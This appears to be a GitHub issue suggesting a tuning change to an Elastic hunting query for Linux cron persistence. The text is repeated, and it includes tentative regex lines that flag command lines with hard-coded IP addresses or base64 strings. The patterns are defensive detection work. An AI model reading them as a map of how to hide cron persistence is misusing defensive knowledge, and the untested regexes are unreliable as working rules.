You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Might be interesting to also include the possibility of base64 encoded strings in the crontab or IP connections. Hope the regex is correct.
//| WHERE process.parent.name RLIKE """.[0-9]{1,3}(.[0-9]{1,3}){3}.""" // Find hard coded IP addresses
//|WHERE process.parent.name RLIKE """[A-Za-z].+==""" // Find Base64 strings (ending in ==)
Example Data
from logs-endpoint.events.process-*
| WHERE @timestamp > now() - 30 day
| WHERE host.os.type == "linux" and event.action == "exec" and event.type == "start" and process.parent.name in ("cron", "fcron", "atd")
//| WHERE process.parent.name RLIKE """.[0-9]{1,3}(.[0-9]{1,3}){3}.""" // Find hard coded IP addresses
//|WHERE process.parent.name RLIKE """[A-Za-z].+==""" // Find Base64 strings (ending in ==)
| STATS cc = count(), host_count = count_distinct(host.id) by process.command_line
| WHERE host_count <= 3
| SORT cc asc
| LIMIT 100
(commented line 4 + 5)
The text was updated successfully, but these errors were encountered:
Link to Rule
https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_cron.toml
Rule Tuning Type
None
Description
Might be interesting to also include the possibility of base64 encoded strings in the crontab or IP connections. Hope the regex is correct.
//| WHERE process.parent.name RLIKE """.[0-9]{1,3}(.[0-9]{1,3}){3}.""" // Find hard coded IP addresses
//|WHERE process.parent.name RLIKE """[A-Za-z].+==""" // Find Base64 strings (ending in ==)
Example Data
from logs-endpoint.events.process-*
| WHERE @timestamp > now() - 30 day
| WHERE host.os.type == "linux" and event.action == "exec" and event.type == "start" and process.parent.name in ("cron", "fcron", "atd")
//| WHERE process.parent.name RLIKE """.[0-9]{1,3}(.[0-9]{1,3}){3}.""" // Find hard coded IP addresses
//|WHERE process.parent.name RLIKE """[A-Za-z].+==""" // Find Base64 strings (ending in ==)
| STATS cc = count(), host_count = count_distinct(host.id) by process.command_line
| WHERE host_count <= 3
| SORT cc asc
| LIMIT 100
(commented line 4 + 5)
The text was updated successfully, but these errors were encountered: